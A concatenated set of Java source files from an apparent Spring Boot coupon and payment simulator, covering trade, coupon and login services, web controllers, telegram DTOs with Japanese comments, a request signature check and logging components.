import com.simulator.dataservice.repository.TradeInfoRepository;
@Service
public class TradeInfoService {
@Autowired
private TradeInfoMapMapper tradeInfoMapMapper;
@Autowired
private TradeInfoRepository tradeInfoRepository;
/** 取引一覧取得(ログインIdと日付指定). */
@Transactional
public List<TradeInfoEntity> selectTradeListByValue(TradeInfoEntity tradeInfoEntity) {
return tradeInfoMapMapper.selectTradeListByValue(tradeInfoEntity);
}
/** 取引詳細情報取得. */
@Transactional
public TradeInfoEntity selectByPk(String transactionId){
return tradeInfoMapMapper.selectByPk(transactionId);
}
/** 取引情報登録. */
@Transactional
public void insertByValue(TradeInfoEntity tradeInfoEntity) {
tradeInfoMapMapper.insertByValue(tradeInfoEntity);
}
/** 取引ステータス更新. */
@Transactional
public void updateStsByPk(TradeInfoEntity tradeInfoEntity) {
tradeInfoMapMapper.updateStsByPk(tradeInfoEntity);
}
/** 取引詳細情報取得. */
@Transactional
public TradeInfoEntity getTradeInfo(String transactionId){
return tradeInfoRepository.getOne(transactionId);
}
/** 変更情報保存取得. */
@Transactional
public void save(TradeInfoEntity tradeInfoEntity){
tradeInfoRepository.save(tradeInfoEntity);
}
/** 取引情報を取得する. */
@Transactional
public List<TradeInfoEntity> findAll() {
return tradeInfoRepository.findAll();
}
/** 取引情報を取得する. */
@Transactional
public void deleteById(String transactionId) {
tradeInfoRepository.deleteById(transactionId);
}
}<file_sep>package com.simulator.webservice.controller.trade;
import java.util.ArrayList;
import java.util.Collections;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.DeleteMapping;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.ModelAttribute;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.PutMapping;
import org.springframework.web.bind.annotation.RequestMapping;
import com.simulator.dataservice.Service.TradeInfoService;
import com.simulator.dataservice.entity.TradeInfoEntity;
@Controller
@RequestMapping("/trades")
public class TradeConfirmController {
@Autowired
private TradeInfoService tradeInfoService;
/**
* ステータス選択の表示に使用するアイテム
*/
final static Map<String, String> SELECT_STATUS = Collections
.unmodifiableMap(new LinkedHashMap<String, String>() {
/**
*
*/
private static final long serialVersionUID = 1L;
{
put("0(未取消)", "0");
put("1(取消済み)", "1");
}
});
/**
* ステータスの表示に使用するアイテム
*/
final static Map<String, String> DISPLAY_STATUS = Collections
.unmodifiableMap(new LinkedHashMap<String, String>() {
/**
*
*/
private static final long serialVersionUID = 1L;
{
put("0", "0(未取消)");
put("1", "1(取消済み)");
}
});
/**
* 取引区分選択の表示に使用するアイテム
*/
final static Map<String, String> SELECT_REGIST_CANCEL_DIVISION = Collections
.unmodifiableMap(new LinkedHashMap<String, String>() {
/**
*
*/
private static final long serialVersionUID = 1L;
{
put("1:利用", "1");
put("2:取消", "2");
put("3:失敗", "3");
put("4:未達", "4");
}
});
/**
* 取引区分の表示に使用するアイテム
*/
final static Map<String, String> DISPLAY_REGIST_CANCEL_DIVISION = Collections
.unmodifiableMap(new LinkedHashMap<String, String>() {
/**
*
*/
private static final long serialVersionUID = 1L;
{
put("1", "1:利用");
put("2", "2:取消");
put("3", "3:失敗");
put("4", "4:未達");
}
});
/**
* インセンティブ提供方の表示に使用するアイテム
*/
final static Map<String, String> DISPLAY_Offer_Type = Collections
.unmodifiableMap(new LinkedHashMap<String, String>() {
/**
*
*/
private static final long serialVersionUID = 1L;
{
put("0", "0(割引)");
put("1", "1(キャッシュバック)");
put("2", "2(ギフト)");
}
});
@GetMapping
public String index(Model model) {
List<TradeInfoEntity> info = tradeInfoService.findAll();
List<TradeInfoEntity> scereenList = new ArrayList<TradeInfoEntity>();
for (TradeInfoEntity tradeInfoDto : info) {
tradeInfoDto.setIncentiveOfferType(DISPLAY_Offer_Type.get(tradeInfoDto.getIncentiveOfferType()));
tradeInfoDto.setRegistCancelDivision(DISPLAY_REGIST_CANCEL_DIVISION.get(tradeInfoDto.getRegistCancelDivision()));
tradeInfoDto.setStatus(DISPLAY_STATUS.get(tradeInfoDto.getStatus()));
scereenList.add(tradeInfoDto);
}
model.addAttribute("tradeInfo", scereenList);
return "trades/tradeInfo";
}
@GetMapping("{transactionId}/edit")
public String edit(@PathVariable String transactionId, Model model) { // ⑤
TradeInfoEntity tradeInfo = tradeInfoService.getTradeInfo(transactionId);
model.addAttribute("tradeInfo", tradeInfo);
model.addAttribute("selectStatus", SELECT_STATUS);
model.addAttribute("selectRCD", SELECT_REGIST_CANCEL_DIVISION);
return "trades/edit";
}
@GetMapping("{transactionId}")
public String show(@PathVariable String transactionId, Model model) {
TradeInfoEntity tradeInfo = tradeInfoService.getTradeInfo(transactionId);
tradeInfo.setIncentiveOfferType(DISPLAY_Offer_Type.get(tradeInfo.getIncentiveOfferType()));
tradeInfo.setRegistCancelDivision(DISPLAY_REGIST_CANCEL_DIVISION.get(tradeInfo.getRegistCancelDivision()));
tradeInfo.setStatus(DISPLAY_STATUS.get(tradeInfo.getStatus()));
model.addAttribute("tradeInfo", tradeInfo);
return "trades/show";
}
@PutMapping("{transactionId}")
public String update(@PathVariable String transactionId, @ModelAttribute TradeInfoEntity tradeInfoEntity) {
TradeInfoEntity info = tradeInfoService.getTradeInfo(transactionId);
info.setRegistCancelDivision(tradeInfoEntity.getRegistCancelDivision());
info.setStatus(tradeInfoEntity.getStatus());
tradeInfoService.save(info);
return "redirect:/trades";
}
@DeleteMapping("{transactionId}")
public String destroy(@PathVariable String transactionId) {
tradeInfoService.deleteById(transactionId);
return "redirect:/trades";
}
}
<file_sep>/*
* HTTPのJSON通信パッケージ.
*/
package com.simulator.http;<file_sep>/*
* ファイル名 TeleIF33DataDto.java
* 開発システム 次期決済システム本格対応 オンライン
* 著作権 Copyright(C) 2018 NTT DATA CORPORATION
* 会社名 NJK
* 作成日 2018/03/30
* 作成者 NJK 姜春雷
* 履歴情報
* 2018/03/30 NJK 姜春雷 初版作成
*/
package com.simulator.telegram.if34;
import java.io.Serializable;
/**
* IF33_クーポン利用取消情報応答DTO(Data部).
*
* @author NJK
* @version 1.0 2018/03/30
*/
public class TeleIF33DataDto implements Serializable {
/**
* シリアルバージョンUID.
*/
private static final long serialVersionUID = 6876409587034598923L;
/**
* クーポントランザクションID(取消).
*/
private String transactionID = "";
/**
* キャンペーン利用取消日時.
*/
private String campaignUseDatetime = "";
/**
* クーポントランザクションID(取消)の取得.
*
* @return transactionID クーポントランザクションID(取消)
*/
public final String getTransactionID() {
return transactionID;
}
/**
* クーポントランザクションID(取消)の設定
*
* @param transactionID
* クーポントランザクションID(取消)
*/
public final void setTransactionID(final String transactionID) {
this.transactionID = transactionID;
}
/**
* キャンペーン利用取消日時の取得.
*
* @return campaignUseDatetime キャンペーン利用取消日時
*/
public final String getCampaignUseDatetime() {
return campaignUseDatetime;
}
/**
* キャンペーン利用取消日時の設定
*
* @param campaignUseDatetime
* キャンペーン利用取消日時
*/
public final void setCampaignUseDatetime(final String campaignUseDatetime) {
this.campaignUseDatetime = campaignUseDatetime;
}
@Override
public String toString() {
StringBuilder builder = new StringBuilder();
builder.append("[");
builder.append("transactionID=");
builder.append(getTransactionID());
builder.append(",campaignUseDatetime=");
builder.append(getCampaignUseDatetime());
builder.append("]");
return builder.toString();
}
}
<file_sep>package com.simulator.common;
import java.util.ArrayList;
import java.util.Collections;
import java.util.Comparator;
import java.util.List;
import java.util.Map;
import org.jboss.logging.Logger;
import com.google.gson.Gson;
import com.simulator.common.util.SHAUtil;
public class RequestJsonCheckUtil {
private static final Logger log = Logger.getLogger(RequestJsonCheckUtil.class);
@SuppressWarnings("unchecked")
public static boolean requestCheck(String postData) {
if (postData == null) {
log.error("PostDataがありません。");
return false;
}
Gson gson = new Gson();
Map<String, String> params = gson.fromJson(
postData, Map.class);
List<Map.Entry<String, String>> filedlist =
new ArrayList<Map.Entry<String, String>>(
params.entrySet());
// ASKIIでソートする
Collections.sort(
filedlist, new Comparator<Map.Entry<String, String>>() {
/* (non-Javadoc)
* @see java.util.Comparator#compare(
* java.lang.Object, java.lang.Object)
*/
/**
* compare.
*
* @param o1 o1
* @param o2 o2
* @return int
*/
public int compare(Map.Entry<String, String> o1,
Map.Entry<String, String> o2) {
return (o1.getKey()).toString().compareTo(o2.getKey());
}
});
StringBuilder requestParamSb = new StringBuilder();
// 取得したリストからSIGN文字を確認する
for (int i = 0; i < filedlist.size(); i++){
if ("identityInfoText".equals(filedlist.get(i).getKey()))
{
continue;
}
requestParamSb.append(filedlist.get(i).getKey());
requestParamSb.append("=");
requestParamSb.append(filedlist.get(i).getValue());
if (i != filedlist.size() - 1) {
requestParamSb.append("&");
}
}
// 識別情報を判断
boolean shaFlag = SHAUtil.CheckSign(
requestParamSb.toString(),
params.get("identityInfoText"));
// 一致しない場合、ログインしないと識別、処理を中止する
if (!shaFlag)
{
return false;
}
return true;
}
}
<file_sep>package com.simulator.dataservice.repository;
import org.springframework.data.jpa.repository.JpaRepository;
import org.springframework.data.jpa.repository.JpaSpecificationExecutor;
import org.springframework.data.repository.CrudRepository;
import com.simulator.dataservice.entity.LoginMngmtEntity;
public interface LoginMngmtRepository
extends JpaRepository<LoginMngmtEntity, String> , CrudRepository<LoginMngmtEntity, String>, JpaSpecificationExecutor<LoginMngmtEntity> {
LoginMngmtEntity findByTerminalLoginId(String terminalLoginId);
}
<file_sep>package com.simulator.webservice.controller.couponconfirm;
import lombok.Getter;
import lombok.Setter;
@Getter
@Setter
public class CouponInfoDto {
private String partnerCompUserId;
private String campaignId;
private String campaignName;
private String campaignComment;
private String incentiveOfferType;
private String kingkExistFlg;
private String targetKingkMin;
private String registCancelDivision;
private Double balance;
private Integer couponRemainUseNum;
private Double discountKingk;
}
<file_sep>/*
* ファイル名 RequestTeleIF42Dto.java
* 開発システム 次期決済システム本格対応 オンライン
* 著作権 Copyright(C) 2018 NTT DATA CORPORATION
* 会社名 NJK
* 作成日 2018/03/20
* 作成者 NJK 戦彦鵬
* 履歴情報
* 2018/03/20 NJK 戦彦鵬 初版作成
*/
package com.simulator.telegram.if42;
import com.simulator.telegram.RequestTeleHeaderDto;
/**
* IF42_パスワード変更DTO.
*
* @author NJK
* @version 1.0 2018/03/20
*/
public class RequestTeleIF42Dto extends RequestTeleHeaderDto {
/**
* シリアルバージョンUID.
*/
private static final long serialVersionUID = -4870061960321478537L;
/**
* 変更前パスワード.
*/
private String password = "";
/**
* 変更後パスワード.
*/
private String newPassword = null;
/**
* 変更前パスワードの取得.
*
* @return password 変更前パスワード
*/
public final String getPassword() {
return password;
}
/**
* 変更前パスワードの設定
*
* @param password
* 変更前パスワード
*/
public final void setPassword(final String password) {
this.password = password;
}
/**
* 変更後パスワードの取得.
*
* @return newPassword 変更後パスワード
*/
public final String getNewPassword() {
return newPassword;
}
/**
* 変更後パスワードの設定
*
* @param newPassword
* 変更後パスワード
*/
public final void setNewPassword(final String newPassword) {
this.newPassword = newPassword;
}
/**
* オブジェクトの文字列表現を返す.
*
* @return オブジェクトの文字列表現
*/
@Override
public String toString() {
StringBuilder builder = new StringBuilder();
builder.append("[");
builder.append("identityInfoText=");
builder.append(getIdentityInfoText());
builder.append(",requestTime=");
builder.append(getRequestTime());
builder.append(",tid=");
builder.append(getTid());
builder.append(",makerCd=");
builder.append(getMakerCd());
builder.append(",osVersion=");
builder.append(getOsVersion());
builder.append(",appCd=");
builder.append(getAppCd());
builder.append(",app=");
builder.append(getApp());
builder.append("]");
return builder.toString();
}
}
<file_sep>/*
* ファイル名 TeleIF29DataDto.java
* 開発システム 次期決済システム本格対応 オンライン
* 著作権 Copyright(C) 2018 NTT DATA CORPORATION
* 会社名 NJK
* 作成日 2018/03/20
* 作成者 NJK 戦彦鵬
* 履歴情報
* 2018/03/20 NJK 戦彦鵬 初版作成
*/
package com.simulator.telegram.if30;
import java.io.Serializable;
/**
* IF29_クーポン消込情報応答DTO(Data部).
*
* @author NJK
* @version 1.0 2018/03/20
*/
public class TeleIF29DataDto implements Serializable {
/**
* シリアルバージョンUID.
*/
private static final long serialVersionUID = 6176658897921372092L;
/**
* トランザクションID.
*/
private String transactionID = "";
/**
* キャンペーン利用日時.
*/
private String campaignUseDatetime = "";
/**
* 取引金額.
*/
private Double transactionKingk = null;
/**
* 優待後金額.
*/
private Double afterDiscountKingk = null;
/**
* 優待金額.
*/
private Double discountKingk = null;
/**
* 提携先ユーザID.
*/
private String partnerCompUserID = "";
/**
* クーポン残利用回数.
*/
private String couponRemainUseNum = "";
/**
* トランザクションIDの取得.
*
* @return transactionID トランザクションID
*/
public final String getTransactionID() {
return transactionID;
}
/**
* トランザクションIDの設定
*
* @param transactionID
* トランザクションID
*/
public final void setTransactionID(final String transactionID) {
this.transactionID = transactionID;
}
/**
* キャンペーン利用日時の取得.
*
* @return campaignUseDatetime キャンペーン利用日時
*/
public final String getCampaignUseDatetime() {
return campaignUseDatetime;
}
/**
* キャンペーン利用日時の設定
*
* @param campaignUseDatetime
* キャンペーン利用日時
*/
public final void setCampaignUseDatetime(final String campaignUseDatetime) {
this.campaignUseDatetime = campaignUseDatetime;
}
/**
* 取引金額の取得.
*
* @return transactionKingk 取引金額
*/
public final Double getTransactionKingk() {
return transactionKingk;
}
/**
* 取引金額の設定
*
* @param transactionKingk
* 取引金額
*/
public final void setTransactionKingk(final Double transactionKingk) {
this.transactionKingk = transactionKingk;
}
/**
* 優待後金額の取得.
*
* @return afterDiscountKingk 優待後金額
*/
public final Double getAfterDiscountKingk() {
return afterDiscountKingk;
}
/**
* 優待後金額の設定
*
* @param afterDiscountKingk
* 優待後金額
*/
public final void setAfterDiscountKingk(final Double afterDiscountKingk) {
this.afterDiscountKingk = afterDiscountKingk;
}
/**
* 優待金額の取得.
*
* @return discountKingk 優待金額
*/
public final Double getDiscountKingk() {
return discountKingk;
}
/**
* 優待金額の設定
*
* @param discountKingk
* 優待金額
*/
public final void setDiscountKingk(final Double discountKingk) {
this.discountKingk = discountKingk;
}
/**
* 提携先ユーザIDの取得.
*
* @return partnerCompUserID 提携先ユーザID
*/
public final String getPartnerCompUserID() {
return partnerCompUserID;
}
/**
* 提携先ユーザIDの設定
*
* @param partnerCompUserID
* 提携先ユーザID
*/
public final void setPartnerCompUserID(final String partnerCompUserID) {
this.partnerCompUserID = partnerCompUserID;
}
/**
* クーポン残利用回数の取得.
*
* @return couponRemainUseNum クーポン残利用回数
*/
public final String getCouponRemainUseNum() {
return couponRemainUseNum;
}
/**
* クーポン残利用回数の設定
*
* @param couponRemainUseNum
* クーポン残利用回数
*/
public final void setCouponRemainUseNum(final String couponRemainUseNum) {
this.couponRemainUseNum = couponRemainUseNum;
}
/**
* オブジェクトの文字列表現を返す.
*
* @return オブジェクトの文字列表現
*/
@Override
public String toString() {
StringBuilder builder = new StringBuilder();
builder.append("[");
builder.append("transactionID=");
builder.append(getTransactionID());
builder.append(",campaignUseDatetime=");
builder.append(getCampaignUseDatetime());
builder.append(",transactionKingk=");
builder.append(getTransactionKingk());
builder.append(",afterDiscountKingk=");
builder.append(getAfterDiscountKingk());
builder.append(",discountKingk=");
builder.append(getDiscountKingk());
builder.append(",couponRemainUseNum=");
builder.append(getCouponRemainUseNum());
builder.append("]");
return builder.toString();
}
}
<file_sep>/*
* ファイル名 ResponseTeleIF43Dto.java
* 開発システム 次期決済システム本格対応 オンライン
* 著作権 Copyright(C) 2018 NTT DATA CORPORATION
* 会社名 NJK
* 作成日 2018/03/16
* 作成者 NJK 戦彦鵬
* 履歴情報
* 2018/03/16 NJK 戦彦鵬 初版作成
*/
package com.simulator.telegram.if44 ;
import com.simulator.telegram.ResponseTeleHeaderDto;
/**
* IF43_取引一覧照会応答DTO.
*
* @author NJK
* @version 1.0 2018/03/16
*/
public class ResponseTeleIF43Dto extends ResponseTeleHeaderDto {
/**
* シリアルバージョンUID.
*/
private static final long serialVersionUID = -2362745027504986682L;
/**
* エラーメッセージ.
*/
private String errorMessage = "";
/**
* データ部.
*/
private TeleIF43DataDto data = null;
/**
* エラーメッセージの取得.
*
* @return errorMessage エラーメッセージ
*/
public final String getErrorMessage() {
return errorMessage;
}
/**
* エラーメッセージの設定.
*
* @param errorMessage
* エラーメッセージ
*/
public final void setErrorMessage(final String errorMessage) {
this.errorMessage = errorMessage;
}
/**
* データの取得.
*
* @return data データ
*/
public TeleIF43DataDto getData() {
return data;
}
/**
* データ部の設定.
*
* @param data
* データ部
*/
public void setData(TeleIF43DataDto data) {
this.data = data;
}
/**
* オブジェクトの文字列表現を返す.
*
* @return オブジェクトの文字列表現
*/
@Override
public String toString() {
StringBuilder builder = new StringBuilder();
builder.append("[");
builder.append("data=");
builder.append(getData().toString());
builder.append(",time=");
builder.append(getTime());
builder.append(",resultCode=");
builder.append(getResultCode());
builder.append(",errorCode=");
builder.append(getErrorCode());
builder.append(",errorMessage=");
builder.append(getErrorMessage());
builder.append("]");
return builder.toString();
}
}
<file_sep>package com.simulator.webservice.controller.couponconfirm;
import java.util.ArrayList;
import java.util.Collections;
import java.util.HashMap;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import org.springframework.beans.BeanUtils;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.DeleteMapping;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.ModelAttribute;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.PutMapping;
import org.springframework.web.bind.annotation.RequestMapping;
import com.simulator.dataservice.Service.CouponInfoService;
import com.simulator.dataservice.entity.CouponInfoEntity;
@Controller
@RequestMapping("/coupons")
public class CouponConfirmController {
@Autowired
private CouponInfoService couponInfoService;
/**
* インセンティブ提供方法選択の表示に使用するアイテム
*/
final static Map<String, String> SELECT_Offer_Type = Collections
.unmodifiableMap(new LinkedHashMap<String, String>() {
/**
*
*/
private static final long serialVersionUID = 1L;
{
put("0(割引)", "0");
put("1(キャッシュバック)", "1");
put("2(ギフト)", "2");
}
});
/**
* インセンティブ提供方の表示に使用するアイテム
*/
final static Map<String, String> DISPLAY_Offer_Type = Collections
.unmodifiableMap(new LinkedHashMap<String, String>() {
/**
*
*/
private static final long serialVersionUID = 1L;
{
put("0", "0(割引)");
put("1", "1(キャッシュバック)");
put("2", "2(ギフト)");
}
});
/**
* 金額入力制御選択の表示に使用するアイテム
*/
final static Map<String, String> SELECT_kingkExistFlg = Collections
.unmodifiableMap(new LinkedHashMap<String, String>() {
/**
*
*/
private static final long serialVersionUID = 1L;
{
put("0(なし)", "0");
put("1(あり)", "1");
}
});
/**
* 金額入力制御表示に使用するアイテム
*/
final static Map<String, String> DISPLAY_kingkExistFlg = Collections
.unmodifiableMap(new LinkedHashMap<String, String>() {
/**
*
*/
private static final long serialVersionUID = 1L;
{
put("0", "0(なし)");
put("1", "1(あり)");
}
});
/**
* 取引区分選択の表示に使用するアイテム
*/
final static Map<String, String> SELECT_REGIST_CANCEL_DIVISION = Collections
.unmodifiableMap(new LinkedHashMap<String, String>() {
/**
*
*/
private static final long serialVersionUID = 1L;
{
put("1:利用", "1");
put("3:失敗", "3");
put("4:未達", "4");
}
});
/**
* 取引区分の表示に使用するアイテム
*/
final static Map<String, String> DISPLAY_REGIST_CANCEL_DIVISION = Collections
.unmodifiableMap(new LinkedHashMap<String, String>() {
/**
*
*/
private static final long serialVersionUID = 1L;
{
put("1", "1:利用");
put("3", "3:失敗");
put("4", "4:未達");
}
});
private final Map<String, String> kingkExistFlgStr = new HashMap<String, String>() {
/**
*
*/
private static final long serialVersionUID = 8161703100044204711L;
{
put("0", "0(なし)");
}
{
put("1", "1(あり)");
}
};
@GetMapping
public String index(Model model) {
List<CouponInfoEntity> info = couponInfoService.findAll();
List<CouponInfoDto> scereenList = new ArrayList<CouponInfoDto>();
for (CouponInfoEntity couponInfoDto : info) {
CouponInfoDto wkScereenInfo = new CouponInfoDto();
BeanUtils.copyProperties(couponInfoDto, wkScereenInfo);
wkScereenInfo.setKingkExistFlg(kingkExistFlgStr.get(wkScereenInfo.getKingkExistFlg()));
wkScereenInfo.setIncentiveOfferType(DISPLAY_Offer_Type.get(wkScereenInfo.getIncentiveOfferType()));
scereenList.add(wkScereenInfo);
}
model.addAttribute("couponInfo", scereenList);
return "coupons/couponsInfo";
}
@GetMapping("new")
public String newCouponr(Model model) {
model.addAttribute("selectItems", SELECT_Offer_Type);
model.addAttribute("selectKingkItems", SELECT_kingkExistFlg);
model.addAttribute("selectTradeItems", SELECT_REGIST_CANCEL_DIVISION);
return "coupons/new";
}
@GetMapping("{partnerCompUserId}/edit")
public String edit(@PathVariable String partnerCompUserId, Model model) { // ⑤
CouponInfoEntity couponInfo = couponInfoService.findOne(partnerCompUserId);
model.addAttribute("couponInfo", couponInfo);
model.addAttribute("selectItems", SELECT_Offer_Type);
model.addAttribute("selectKingkItems", SELECT_kingkExistFlg);
model.addAttribute("selectTradeItems", SELECT_REGIST_CANCEL_DIVISION);
return "coupons/edit";
}
@GetMapping("{partnerCompUserId}")
public String show(@PathVariable String partnerCompUserId, Model model) {
CouponInfoEntity couponInfo = couponInfoService.findOne(partnerCompUserId);
couponInfo.setIncentiveOfferType(DISPLAY_Offer_Type.get(couponInfo.getIncentiveOfferType()));
couponInfo.setKingkExistFlg(DISPLAY_kingkExistFlg.get(couponInfo.getKingkExistFlg()));
couponInfo.setRegistCancelDivision(DISPLAY_REGIST_CANCEL_DIVISION.get(couponInfo.getRegistCancelDivision()));
model.addAttribute("couponInfo", couponInfo);
return "coupons/show";
}
@PostMapping
public String create(@ModelAttribute CouponInfoEntity couponInfoMapEntity) { // ⑥
couponInfoService.insertByValu(couponInfoMapEntity);
return "redirect:/coupons"; // ⑦
}
@PutMapping("{partnerCompUserId}")
public String update(@PathVariable String partnerCompUserId, @ModelAttribute CouponInfoEntity couponInfoEntity) {
couponInfoEntity.setPartnerCompUserId(partnerCompUserId);
couponInfoService.save(couponInfoEntity);
return "redirect:/coupons";
}
@DeleteMapping("{partnerCompUserId}")
public String destroy(@PathVariable String partnerCompUserId) {
couponInfoService.delete(partnerCompUserId);
return "redirect:/coupons";
}
}
<file_sep>/*
* WEBサービスの制御CONTROLパッケージ.
*/
package com.simulator.webservice.controller;<file_sep>package com.simulator.dataservice.mapper;
import com.simulator.dataservice.entity.LoginMngmtEntity;
public interface LoginMngmtMapper {
void updateLoginPassByPK(LoginMngmtEntity loginMngmtEntity);
void insertValu(LoginMngmtEntity loginMngmtEntity);
}
<file_sep>package com.simulator.webservice.controller.userconfirm;
import java.sql.Timestamp;
import lombok.Getter;
import lombok.Setter;
@Getter
@Setter
public class LoginMngmtDto {
/** 端末ログインID. */
private String terminalLoginId;
/** 事業者名. */
private String companyName;
/** 館名. */
private String buildingName;
/** 店舗名. */
private String storeName;
/** ログインパスワード. */
private String loginPass;
/** 有効期限. */
private Timestamp expDate;
/** 有効期限画面表示用. */
private String displayExpDate;
/** 提携先ユーザID開始位置. */
private Integer partnerUserIdStrat;
/** 提携先ユーザID終了位置. */
private Integer partnerUserIdEnd;
/** ログイン制御. */
private String loginControl;
/** パスワード更新制御. */
private String updateControl;
/** 利用確認制御. */
private String confirmControl;
/** クーポン消込制御_消込なし. */
private String useOffControl;
/** クーポン消込制御_消込あり. */
private String useOnControl;
/** 取引一覧照会制御. */
private String rusultControl;
/** 取消制御. */
private String cancelControl;
/** 詳細照会制御. */
private String detailControl;
}
<file_sep>package com.simulator.http.filter;
import java.io.IOException;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import org.slf4j.MDC;
import org.springframework.stereotype.Component;
@Component
public class LoggingFilter implements Filter {
@Override
public void init(FilterConfig filterConfig) throws ServletException {
}
@Override
public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain)
throws IOException, ServletException {
WrappedHttpServletRequest requestWrapper = null;
if (servletRequest instanceof HttpServletRequest) {
HttpServletRequest httpServletRequest =
(HttpServletRequest) servletRequest;
if ("POST".equals(
httpServletRequest.getMethod().toUpperCase())) {
requestWrapper = new WrappedHttpServletRequest(
httpServletRequest);
MDC.put("postData", requestWrapper.getRequestParams());
}
}
if (requestWrapper == null) {
filterChain.doFilter(
servletRequest, servletResponse);
} else {
filterChain.doFilter(
requestWrapper, servletResponse);
}
}
@Override
public void destroy() {
}
}<file_sep>package com.simulator.webservice.controller;
import java.util.ArrayList;
import java.util.List;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.ModelAttribute;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.PutMapping;
import org.springframework.web.bind.annotation.RequestMapping;
import com.simulator.dataservice.Service.CouponInfoService;
import com.simulator.dataservice.entity.CouponInfoEntity;
import com.simulator.webservice.controller.from.ResetInfoFrom;
@Controller
@RequestMapping("/")
public class IndexController {
@Autowired
private CouponInfoService couponInfoService;
@GetMapping
public String index(Model model) {
List<CouponInfoEntity> info = couponInfoService.findAll();
ArrayList<String> couponList = new ArrayList<String>();
for (CouponInfoEntity couponInfoEntity : info) {
couponList.add(couponInfoEntity.getPartnerCompUserId());
}
CouponInfoEntity infoEntity = new CouponInfoEntity();
infoEntity.setPartnerCompUserId(null);
model.addAttribute("resetInfo", infoEntity);
model.addAttribute("displayList", couponList);
return "index";
}
@PutMapping("{partnerCompUserId}")
public String update(@PathVariable String partnerCompUserId, @ModelAttribute ResetInfoFrom resetInfoFrom) {
CouponInfoEntity updateInfo = new CouponInfoEntity();
String userId = resetInfoFrom.getPartnerCompUserId().substring(1);
updateInfo = couponInfoService.findOne(userId);
if (resetInfoFrom.getBalance() != null) {
updateInfo.setBalance(updateInfo.getBalance() + resetInfoFrom.getBalance());
}
if (resetInfoFrom.getCouponRemainUseNum() != null) {
updateInfo.setCouponRemainUseNum(updateInfo.getCouponRemainUseNum() + resetInfoFrom.getCouponRemainUseNum());
}
couponInfoService.save(updateInfo);
return "redirect:/";
}
@PutMapping("reset")
public String reset(@ModelAttribute ResetInfoFrom resetInfoFrom) {
List<CouponInfoEntity> wkResetInfo = couponInfoService.findAll();
List<CouponInfoEntity> resetInfo = new ArrayList<CouponInfoEntity>();
for (CouponInfoEntity couponInfoEntity : wkResetInfo) {
if (resetInfoFrom.getBalance() != null) {
couponInfoEntity.setBalance(resetInfoFrom.getBalance());
}
if (resetInfoFrom.getCouponRemainUseNum() != null) {
couponInfoEntity.setCouponRemainUseNum(resetInfoFrom.getCouponRemainUseNum());
}
resetInfo.add(couponInfoEntity);
}
couponInfoService.saveAll(resetInfo);
return "redirect:/";
}
}
<file_sep>package com.simulator.http;
import org.aspectj.lang.ProceedingJoinPoint;
import org.aspectj.lang.annotation.Around;
import org.aspectj.lang.annotation.Aspect;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.stereotype.Component;
import org.springframework.util.StopWatch;
@Component
@Aspect
public class ProcessingTimeLoggingAspect {
private static final Logger logger = LoggerFactory.getLogger(ProcessingTimeLoggingAspect.class);
@Around("@within(org.springframework.web.bind.annotation.RestController)")
public Object logging(ProceedingJoinPoint pjp) throws Throwable {
StopWatch stopWatch = new StopWatch();
stopWatch.start();
Object returnObject;
try {
returnObject = pjp.proceed();
} finally {
stopWatch.stop();
logger.info("{} : {} ms", pjp.getSignature(), stopWatch.getTotalTimeMillis());
}
return returnObject;
}
}<file_sep>package com.simulator.dataservice.Service;
import java.util.List;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;
import org.springframework.transaction.annotation.Transactional;
import com.simulator.dataservice.entity.LoginMngmtEntity;
import com.simulator.dataservice.mapper.LoginMngmtMapper;
import com.simulator.dataservice.repository.LoginMngmtRepository;
@Service
public class LoginMngmtService {
@Autowired
private LoginMngmtMapper loginMngmtMapper;
@Autowired
private LoginMngmtRepository loginMngmtRepository;
/** ログインパスワード更新. */
@Transactional
public void updateLoginPassByPK(LoginMngmtEntity loginMngmtBean) {
loginMngmtMapper.updateLoginPassByPK(loginMngmtBean);
}
public List<LoginMngmtEntity> findAll() {
return loginMngmtRepository.findAll();
}
public LoginMngmtEntity selectByPk(String terminalLoginId) {
return loginMngmtRepository.findByTerminalLoginId(terminalLoginId);
}
@Transactional
public void save(LoginMngmtEntity loginMngmtEntity) {
loginMngmtRepository.save(loginMngmtEntity);
}
public LoginMngmtEntity findByPk(String terminalLoginId) {
return loginMngmtRepository.findByTerminalLoginId(terminalLoginId);
}
public LoginMngmtEntity getOne(String terminalLoginId) {
return loginMngmtRepository.getOne(terminalLoginId);
}
@Transactional
public void delete(String terminalLoginId) {
loginMngmtRepository.deleteById(terminalLoginId);
}
@Transactional
public void insertValu(LoginMngmtEntity loginMngmtMapEntity) {
loginMngmtMapper.insertValu(loginMngmtMapEntity);
}
}
|
6922f75cb7fba3e1da7bad864fed3b8bb1d5039a
|
[
"Java"
] | 23 |
Java
|
zerokim123/SimulatorRepository
|
a7869a68d10a8dbd9d3f1846b03b4cd75595a2f5
|
25fd8858ad8c278f81f23acde8985190c97126de
|
refs/heads/master
|
<repo_name>StarkAndroid/FinalProject2<file_sep>/app/src/main/java/com/udacity/gradle/builditbigger/EndpointsAsyncTask.java
package com.udacity.gradle.builditbigger;
import android.content.Context;
import android.content.Intent;
import android.os.AsyncTask;
import android.util.Log;
import android.util.Pair;
import android.widget.Toast;
